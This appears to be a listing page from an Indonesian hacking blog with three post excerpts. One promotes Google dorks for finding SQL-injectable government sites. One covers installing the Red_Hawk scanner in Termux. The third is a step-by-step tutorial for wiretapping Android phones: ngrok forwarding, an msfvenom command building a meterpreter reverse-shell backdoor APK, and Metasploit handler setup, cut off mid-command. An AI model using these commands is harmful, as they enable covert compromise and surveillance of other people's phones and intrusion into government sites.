Langsung ke konten utama

Postingan

Menampilkan postingan dari Mei, 2018

SQL GOV Dorks With Error Quick

hello sobat infokus,, mimin mau share nih google dork sqli with ERRORS QUICK kalo ente beruntung bisa dapet situs gov lo guys,, Dorknya ada di bawah bosku.

Cara install Red_Hawk di Termux

Assalamu'alaikum Sobat ☺ Nubie yang hina ini mau berbagi tutor neh cara install tools yang mantep (wew) Tools yang Nubie sukai dengan tampilannya yang cantik nan indah 😆 hwhwhw Ok kita Review dlo y tools nya biar tambah kepincut 😂 Nah liat noh list scan nya mantap bat kn ? Mnrut Nubie pribadi Tools ini sudah sangat lengkap tinggal gimana cara kalian gunain dan ngembanginnya 😉 Nubie tulis dah list of scan Nya biar greget [ List Of scan or action ] Basic Scan Site Title  NEW IP Address Web Server Detection  IMPROVED CMS Detection Cloudflare Detection robots.txt Scanner Whois Lookup  IMPROVED Geo-IP Lookup Grab Banners  IMPROVED DNS Lookup Subnet Calculator Nmap Port Scan Sub-Domain Scanner  IMPROVED Sub Domain IP Address Reverse IP Lookup & CMS Detection IMPROVED Hostname IP Address CMS Error Based SQLi Scanner Bloggers View  NEW HTTP Response Code Site Title Alexa Ranking Domain Authority Page Authority Social Links Extra

Sadap Android Dengan Metasploit via Termux

Yo bosku,gak usah banyak cek cok ya, dah capek abis kerja di real life (duh jd curhat) :v langsung  simak saja tutornya 😘 .Forwardingalian  sudah menginstall metasploit dan ngrok ya boss karna di sini kita butuh ngrok buat port forwarding,jika belum kalian bisa cari di google :v latau ain kali saya akan memposting di artikel selanjutnya. [pertama] aktifkan ngrokmu : ketik   ./ngrok tcp 1945  (1945 hanya contoh kalian bisa ganti sesuka hati) [kedua]  buat dulu backdoornya boss,buka termuxmu dan masuk di dir/folder mana kamu pengen nempatin backdoornya contoh : cd /sdcard/demo kemudian ketik :  msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10637   R > backdoor.apk  ( 0.tcp.ngrok.io  isi dengan ip yg di ngrok, 10362  isi dengan port yang ada di ngrok) [next] [ketiga] jalankan metasploitmu kalo sudah terbuka ketik :  use exploit/multi/handler ketik :  set payload android/meterpreter/reverse_tcp ketik :  set Lhost localhost ketik :  set Lport